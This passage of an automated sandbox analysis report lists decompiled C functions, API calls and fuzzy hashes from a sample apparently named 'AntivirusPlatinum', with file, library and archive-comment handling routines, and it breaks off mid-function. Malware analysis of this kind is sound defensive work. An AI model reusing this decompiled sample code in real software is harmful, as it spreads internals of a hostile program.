                                                                                                                                                              • Instruction ID: 9bc01b0654b97ff9a9f2776f7e551ab648acc0d6ddbdf71c92faa3387c9e9ffb
                                                                                                                                                              • Opcode Fuzzy Hash: 043e15b43511c9b9b8142bd98649a3dbf74fd64d15c554c5aa4f09793c13f6a9
                                                                                                                                                              • Instruction Fuzzy Hash: 53E0ED72C0212AA7CB106BF29E0CCDF7F6CEE052517008461B506E2054D678D215C7F5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E00405351(void* __ecx, long _a4, long _a8, signed int _a12) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				long _t19;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				long _t28;
                                                                                                                                                              				long _t31;
                                                                                                                                                              
                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t25 = __ecx;
                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                                                                                                              					L12:
                                                                                                                                                              					_t15 = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t28 = _a8;
                                                                                                                                                              					_t31 = _t28;
                                                                                                                                                              					if(_t31 <= 0 && (_t31 < 0 || _a4 < 0) && _a12 != 0) {
                                                                                                                                                              						if(_a12 != 1) {
                                                                                                                                                              							_t21 = E0040554A(_t22, _t23, __eflags);
                                                                                                                                                              						} else {
                                                                                                                                                              							_t21 = E00404FDC(_t22, _t23);
                                                                                                                                                              						}
                                                                                                                                                              						_a4 = _a4 + _t21;
                                                                                                                                                              						asm("adc esi, edx");
                                                                                                                                                              						_a12 = _a12 & 0x00000000;
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = _t28;
                                                                                                                                                              					_t19 = SetFilePointer( *(_t25 + 4), _a4,  &_v8, _a12); // executed
                                                                                                                                                              					if(_t19 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                              						goto L12;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t15 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}











                                                                                                                                                              0x00405351
                                                                                                                                                              0x00405354
                                                                                                                                                              0x00405356
                                                                                                                                                              0x0040535c
                                                                                                                                                              0x004053be
                                                                                                                                                              0x004053be
                                                                                                                                                              0x0040535e
                                                                                                                                                              0x0040535f
                                                                                                                                                              0x00405362
                                                                                                                                                              0x00405364
                                                                                                                                                              0x00405378
                                                                                                                                                              0x00405381
                                                                                                                                                              0x0040537a
                                                                                                                                                              0x0040537a
                                                                                                                                                              0x0040537a
                                                                                                                                                              0x00405386
                                                                                                                                                              0x00405389
                                                                                                                                                              0x0040538b
                                                                                                                                                              0x0040538b
                                                                                                                                                              0x0040539e
                                                                                                                                                              0x004053a4
                                                                                                                                                              0x004053ae
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053ba
                                                                                                                                                              0x004053ba
                                                                                                                                                              0x004053ba
                                                                                                                                                              0x004053ae
                                                                                                                                                              0x004053c2

                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(?,000000FF,?,?,?,00000000,?,?,00405501,?,?,?,?,0040941C,000000FF), ref: 004053A4
                                                                                                                                                              • GetLastError.KERNEL32(00405501,?,?,?,?,0040941C,000000FF,?,00000000,00000000,?,00000000,00000001,00000000,00000000,?), ref: 004053B0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: @Met
                                                                                                                                                              • API String ID: 2976181284-2381362037
                                                                                                                                                              • Opcode ID: ed057684c9aded8822d7a98cc1ab320d41f793df05a2235f4b6bd6fd049a5b35
                                                                                                                                                              • Instruction ID: f3af7dc040878406d74d12ace788650f613bc42b46e0a769c9035ee9dabafcab
                                                                                                                                                              • Opcode Fuzzy Hash: ed057684c9aded8822d7a98cc1ab320d41f793df05a2235f4b6bd6fd049a5b35
                                                                                                                                                              • Instruction Fuzzy Hash: AA018031400B14EFCB148E54C8056EF7769FB003A4F10823AFD25A22D0C7F89951DE99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004115FD(struct HINSTANCE__** __ecx) {
                                                                                                                                                              				struct HINSTANCE__* _t3;
                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                              				struct HINSTANCE__** _t11;
                                                                                                                                                              				struct HINSTANCE__* _t12;
                                                                                                                                                              
                                                                                                                                                              				_t11 = __ecx;
                                                                                                                                                              				_t3 =  *__ecx;
                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                              					FreeLibrary(_t3); // executed
                                                                                                                                                              				}
                                                                                                                                                              				_t12 =  *(_t11 + 4);
                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                              					FreeLibrary(_t12);
                                                                                                                                                              				}
                                                                                                                                                              				_t4 =  *0x41fff0; // 0x7645c100
                                                                                                                                                              				return  *((intOrPtr*)( *_t4 + 8))(_t4);
                                                                                                                                                              			}







                                                                                                                                                              0x004115fe
                                                                                                                                                              0x00411600
                                                                                                                                                              0x0041160b
                                                                                                                                                              0x0041160e
                                                                                                                                                              0x0041160e
                                                                                                                                                              0x00411610
                                                                                                                                                              0x00411615
                                                                                                                                                              0x00411618
                                                                                                                                                              0x00411618
                                                                                                                                                              0x0041161a
                                                                                                                                                              0x00411627

                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D46A), ref: 0041160E
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D46A), ref: 00411618
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe, xrefs: 004115FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                              • API String ID: 3664257935-570708375
                                                                                                                                                              • Opcode ID: 5a911f39bc500288cfb1d4df0ab43fc2f250b8dfc3319a74055b1690a66653f5
                                                                                                                                                              • Instruction ID: 62aa9ad67f2bc5607cfcf4aabbf5f4da411644a76b014e87a6fdd9beea94847b
                                                                                                                                                              • Opcode Fuzzy Hash: 5a911f39bc500288cfb1d4df0ab43fc2f250b8dfc3319a74055b1690a66653f5
                                                                                                                                                              • Instruction Fuzzy Hash: 2DE012327011209B86209F59EC049CBF3ECAFD971131A446BF945E3320C7A5EC428AAC
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E0040AAC2(void* __ecx, intOrPtr _a4, int _a8) {
                                                                                                                                                              				struct _ITEMIDLIST* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				intOrPtr* _t12;
                                                                                                                                                              
                                                                                                                                                              				__imp__SHGetMalloc( &_v12, __ecx, __ecx);
                                                                                                                                                              				SHGetSpecialFolderLocation(0, _a8,  &_v8); // executed
                                                                                                                                                              				__imp__SHGetPathFromIDListA(_v8, _a4); // executed
                                                                                                                                                              				_t12 = _v12;
                                                                                                                                                              				return  *((intOrPtr*)( *_t12 + 0x14))(_t12, _v8);
                                                                                                                                                              			}






                                                                                                                                                              0x0040aacb
                                                                                                                                                              0x0040aada
                                                                                                                                                              0x0040aae6
                                                                                                                                                              0x0040aaec
                                                                                                                                                              0x0040aaf9

                                                                                                                                                              APIs
                                                                                                                                                              • SHGetMalloc.SHELL32(?), ref: 0040AACB
                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 0040AADA
                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(?,?), ref: 0040AAE6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FolderFromListLocationMallocPathSpecial
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 628029987-0
                                                                                                                                                              • Opcode ID: 70809a305a85a622d48bfe35fb9c38ef5d9240c8d15e14ba5eed05ab10784309
                                                                                                                                                              • Instruction ID: 88ba9e9cb9406764b26f187acffb5ba189f573144994a3fa657e37118bd86729
                                                                                                                                                              • Opcode Fuzzy Hash: 70809a305a85a622d48bfe35fb9c38ef5d9240c8d15e14ba5eed05ab10784309
                                                                                                                                                              • Instruction Fuzzy Hash: E2E0C276500109FFDF05DFD0DE09EDE7B79EB08205F104060F605D6120D6719A24DB20
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E004018CB(void* __ecx, void* __edx, void* __edi, CHAR** _a4, long _a8) {
                                                                                                                                                              				char _v28;
                                                                                                                                                              				long _t27;
                                                                                                                                                              				signed int _t29;
                                                                                                                                                              				long _t30;
                                                                                                                                                              				signed int _t35;
                                                                                                                                                              				signed int _t48;
                                                                                                                                                              				long _t50;
                                                                                                                                                              				long _t67;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				CHAR** _t70;
                                                                                                                                                              
                                                                                                                                                              				_t69 = __ecx;
                                                                                                                                                              				if( *((char*)(__ecx + 0x6d8b)) != 0) {
                                                                                                                                                              					E0040A7E9( &_v28, __edx, __ecx);
                                                                                                                                                              					__eflags =  *(_t69 + 0x4694) & 0x00000002;
                                                                                                                                                              					_push(0);
                                                                                                                                                              					_push(0);
                                                                                                                                                              					if(( *(_t69 + 0x4694) & 0x00000002) == 0) {
                                                                                                                                                              						_push(( *(_t69 + 0x4696) & 0x0000ffff) +  *((intOrPtr*)(_t69 + 0x6d94)) + 7);
                                                                                                                                                              						E004054ED(_t69);
                                                                                                                                                              						_t27 = E00402790(_t69, __edx, __eflags, "CMT");
                                                                                                                                                              						__eflags = _t27;
                                                                                                                                                              						if(_t27 == 0) {
                                                                                                                                                              							L11:
                                                                                                                                                              							_t48 = 0;
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              							L12:
                                                                                                                                                              							E0040A810( &_v28);
                                                                                                                                                              							_t29 = _t48;
                                                                                                                                                              							L13:
                                                                                                                                                              							return _t29;
                                                                                                                                                              						}
                                                                                                                                                              						_t30 = E00401722(_t69, _a4, _a8); // executed
                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                              							goto L11;
                                                                                                                                                              						}
                                                                                                                                                              						_t48 = 1;
                                                                                                                                                              						goto L12;
                                                                                                                                                              					}
                                                                                                                                                              					_push( *((intOrPtr*)(_t69 + 0x6d94)) + 0x14);
                                                                                                                                                              					E004054ED(_t69);
                                                                                                                                                              					E00401CE5(_t69, __edx, __eflags);
                                                                                                                                                              					_t70 = _a4;
                                                                                                                                                              					_t50 = _t70[1];
                                                                                                                                                              					__eflags = _t50;
                                                                                                                                                              					if(_t50 > 0) {
                                                                                                                                                              						OemToCharBuffA( *_t70,  *_t70, _t50);
                                                                                                                                                              						_t67 = _a8;
                                                                                                                                                              						__eflags = _t67;
                                                                                                                                                              						if(_t67 != 0) {
                                                                                                                                                              							E004016BF(_t67, _t50 + 1);
                                                                                                                                                              							E004016A4(_t70, 0);
                                                                                                                                                              							E0040E144( *_t70,  *_t67, _t50 + 1);
                                                                                                                                                              							E00401708(_t70, _t50);
                                                                                                                                                              							E004016BF(_t67, E0040E321( *_t67));
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t35 = E0040A810( &_v28);
                                                                                                                                                              					__eflags = _t70[1];
                                                                                                                                                              					_t29 = _t35 & 0xffffff00 | _t70[1] > 0x00000000;
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}













                                                                                                                                                              0x004018d2
                                                                                                                                                              0x004018db
                                                                                                                                                              0x004018e9
                                                                                                                                                              0x004018ee
                                                                                                                                                              0x004018f5
                                                                                                                                                              0x004018f7
                                                                                                                                                              0x004018f9
                                                                                                                                                              0x00401990
                                                                                                                                                              0x00401993
                                                                                                                                                              0x0040199f
                                                                                                                                                              0x004019a4
                                                                                                                                                              0x004019a6
                                                                                                                                                              0x004019bd
                                                                                                                                                              0x004019bd
                                                                                                                                                              0x004019bd
                                                                                                                                                              0x004019bf
                                                                                                                                                              0x004019c2
                                                                                                                                                              0x004019c7
                                                                                                                                                              0x004019c9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004019c9
                                                                                                                                                              0x004019b0
                                                                                                                                                              0x004019b5
                                                                                                                                                              0x004019b7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004019b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004019b9
                                                                                                                                                              0x00401908
                                                                                                                                                              0x0040190b
                                                                                                                                                              0x00401912
                                                                                                                                                              0x00401917
                                                                                                                                                              0x0040191a
                                                                                                                                                              0x0040191d
                                                                                                                                                              0x0040191f
                                                                                                                                                              0x00401927
                                                                                                                                                              0x0040192d
                                                                                                                                                              0x00401930
                                                                                                                                                              0x00401932
                                                                                                                                                              0x0040193a
                                                                                                                                                              0x00401943
                                                                                                                                                              0x00401950
                                                                                                                                                              0x00401958
                                                                                                                                                              0x00401967
                                                                                                                                                              0x00401967
                                                                                                                                                              0x0040196c
                                                                                                                                                              0x00401973
                                                                                                                                                              0x00401978
                                                                                                                                                              0x0040197a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040197a
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BuffChar
                                                                                                                                                              • String ID: CMT
                                                                                                                                                              • API String ID: 1973267554-2756464174
                                                                                                                                                              • Opcode ID: 2e9d570f032067c190e5b78061e61d6a7d6deba71149c226ed3cc396c12f8cc3
                                                                                                                                                              • Instruction ID: fbbbaea41a28c93ea3a5d1c6e8216a3bc702e01cd4883bdb15f1a6495baf4321
                                                                                                                                                              • Opcode Fuzzy Hash: 2e9d570f032067c190e5b78061e61d6a7d6deba71149c226ed3cc396c12f8cc3
                                                                                                                                                              • Instruction Fuzzy Hash: 2E21E5717002106BDB10AB21CD91EAF739D9F44708F04442FF856B72E2DB39AD12C799
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E00404F2E(void* __ecx) {
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				int _t22;
                                                                                                                                                              				signed int _t23;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              
                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                              				_t24 = 1;
                                                                                                                                                              				if( *(__ecx + 0xc) == 0) {
                                                                                                                                                              					_t18 =  *(__ecx + 4);
                                                                                                                                                              					if(_t18 == 0xffffffff) {
                                                                                                                                                              						L14:
                                                                                                                                                              						 *((intOrPtr*)(_t30 + 0xc1c)) =  *((intOrPtr*)(_t30 + 0xc1c)) + 1;
                                                                                                                                                              						return _t24;
                                                                                                                                                              					}
                                                                                                                                                              					if( *((char*)(__ecx + 0x10)) != 0) {
                                                                                                                                                              						L11:
                                                                                                                                                              						 *(_t30 + 4) =  *(_t30 + 4) | 0xffffffff;
                                                                                                                                                              						if(_t24 == 0 &&  *((intOrPtr*)(_t30 + 0x14)) != _t24) {
                                                                                                                                                              							_t15 = _t30 + 0x17; // 0x17
                                                                                                                                                              							E004032D5(0x414c7c, _t15);
                                                                                                                                                              						}
                                                                                                                                                              						goto L14;
                                                                                                                                                              					}
                                                                                                                                                              					_t22 = FindCloseChangeNotification(_t18); // executed
                                                                                                                                                              					asm("sbb bl, bl");
                                                                                                                                                              					_t24 =  ~(_t22 - 1) + 1;
                                                                                                                                                              					if(1 != 0 ||  *0x414c70 == 0) {
                                                                                                                                                              						_t23 = 0;
                                                                                                                                                              						while( *(0x414870 + _t23 * 4) != _t30) {
                                                                                                                                                              							_t23 = _t23 + 1;
                                                                                                                                                              							if(_t23 < 0x100) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							goto L11;
                                                                                                                                                              						}
                                                                                                                                                              						 *(0x414870 + _t23 * 4) =  *(0x414870 + _t23 * 4) & 0x00000000;
                                                                                                                                                              					}
                                                                                                                                                              					goto L11;
                                                                                                                                                              				}
                                                                                                                                                              				 *(__ecx + 0xc) =  *(__ecx + 0xc) & 0x00000000;
                                                                                                                                                              				goto L14;
                                                                                                                                                              			}








                                                                                                                                                              0x00404f30
                                                                                                                                                              0x00404f36
                                                                                                                                                              0x00404f38
                                                                                                                                                              0x00404f40
                                                                                                                                                              0x00404f46
                                                                                                                                                              0x00404fa1
                                                                                                                                                              0x00404fa1
                                                                                                                                                              0x00404fab
                                                                                                                                                              0x00404fab
                                                                                                                                                              0x00404f4c
                                                                                                                                                              0x00404f86
                                                                                                                                                              0x00404f86
                                                                                                                                                              0x00404f8c
                                                                                                                                                              0x00404f93
                                                                                                                                                              0x00404f9c
                                                                                                                                                              0x00404f9c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404f8c
                                                                                                                                                              0x00404f4f
                                                                                                                                                              0x00404f5a
                                                                                                                                                              0x00404f5c
                                                                                                                                                              0x00404f5e
                                                                                                                                                              0x00404f69
                                                                                                                                                              0x00404f6b
                                                                                                                                                              0x00404f74
                                                                                                                                                              0x00404f7a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404f7c
                                                                                                                                                              0x00404f7e
                                                                                                                                                              0x00404f7e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404f5e
                                                                                                                                                              0x00404f3a
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,004054A9,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E,?), ref: 00404F4F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                              • String ID: |LA
                                                                                                                                                              • API String ID: 2591292051-4290591017
                                                                                                                                                              • Opcode ID: 6f0d0f8878a62e980662d6e6074bd5ba14a99120c2933f954b287655d349c058
                                                                                                                                                              • Instruction ID: fb12770f161869685dacc0fb60d23730991de6ff872b0f0e221dcc50feffd473
                                                                                                                                                              • Opcode Fuzzy Hash: 6f0d0f8878a62e980662d6e6074bd5ba14a99120c2933f954b287655d349c058
                                                                                                                                                              • Instruction Fuzzy Hash: 6701D4F01517118FE3309A34A5587A37798A796322F104B3FD6E2D36D0D37CA8868B49
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004051D8(void* __ecx, CHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12) {
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t23;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              				WCHAR* _t36;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              
                                                                                                                                                              				_t34 = __ecx;
                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                              				if(_a12 != 0) {
                                                                                                                                                              					L2:
                                                                                                                                                              					_a12 = 1;
                                                                                                                                                              				} else {
                                                                                                                                                              					_a12 = 0;
                                                                                                                                                              					if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                              						goto L2;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t22 = E00406EA5();
                                                                                                                                                              				_t36 = _a8;
                                                                                                                                                              				if(_t22 == 0 || _t36 == 0 ||  *_t36 == 0) {
                                                                                                                                                              					_t23 = CreateFileA(_a4, 0xc0000000, _a12, 0, 2, 0, 0); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					_t23 = CreateFileW(_t36, 0xc0000000, _a12, 0, 2, 0, 0);
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t37 + 4) = _t23;
                                                                                                                                                              				 *((char*)(_t37 + 0x12)) = 1;
                                                                                                                                                              				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                                                                                              				 *((char*)(_t37 + 0x10)) = 0;
                                                                                                                                                              				if(_t36 == 0) {
                                                                                                                                                              					 *((short*)(_t37 + 0x418)) = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					E0040E338(_t37 + 0x418, _t36);
                                                                                                                                                              				}
                                                                                                                                                              				_t25 = _t37 + 0x17;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					E0040E115(_t34, _t36, _t25, 0x1000000);
                                                                                                                                                              				} else {
                                                                                                                                                              					E0040A477(_t25, _a4);
                                                                                                                                                              				}
                                                                                                                                                              				E00404F07(_t37,  *(_t37 + 4));
                                                                                                                                                              				return 0 |  *(_t37 + 4) != 0xffffffff;
                                                                                                                                                              			}








                                                                                                                                                              0x004051d8
                                                                                                                                                              0x004051e0
                                                                                                                                                              0x004051e5
                                                                                                                                                              0x004051ef
                                                                                                                                                              0x004051ef
                                                                                                                                                              0x004051e7
                                                                                                                                                              0x004051e7
                                                                                                                                                              0x004051ed
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004051ed
                                                                                                                                                              0x004051f6
                                                                                                                                                              0x004051fb
                                                                                                                                                              0x00405200
                                                                                                                                                              0x00405231
                                                                                                                                                              0x0040520b
                                                                                                                                                              0x00405219
                                                                                                                                                              0x00405219
                                                                                                                                                              0x00405237
                                                                                                                                                              0x0040523a
                                                                                                                                                              0x0040523e
                                                                                                                                                              0x00405241
                                                                                                                                                              0x00405246
                                                                                                                                                              0x00405259
                                                                                                                                                              0x00405248
                                                                                                                                                              0x00405250
                                                                                                                                                              0x00405250
                                                                                                                                                              0x00405260
                                                                                                                                                              0x00405266
                                                                                                                                                              0x0040527a
                                                                                                                                                              0x00405268
                                                                                                                                                              0x0040526c
                                                                                                                                                              0x0040526c
                                                                                                                                                              0x00405284
                                                                                                                                                              0x00405296

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404EB3,00000045,?,00000001,00000045), ref: 00405219
                                                                                                                                                              • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404EB3,00000045,?,00000001,00000045), ref: 00405231
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: ec04e94c21e6327de585a74cc546da97f01177137bb2f8558239996e927b6dc1
                                                                                                                                                              • Instruction ID: db8e20e7d0df6165b05d6c65c26f56ad29c5289aa69bd9df7c45a2987c6c6b35
                                                                                                                                                              • Opcode Fuzzy Hash: ec04e94c21e6327de585a74cc546da97f01177137bb2f8558239996e927b6dc1
                                                                                                                                                              • Instruction Fuzzy Hash: BF21CF71000748BFEB209F60CC85FAB7BA8EF40744F04897EF551A6281C7789D649F69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405767(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                              				long _t6;
                                                                                                                                                              				WCHAR* _t8;
                                                                                                                                                              
                                                                                                                                                              				if(E00406EA5() == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					_t6 = GetFileAttributesA(_a4); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					_t8 = _a8;
                                                                                                                                                              					if(_t8 == 0 ||  *_t8 == 0) {
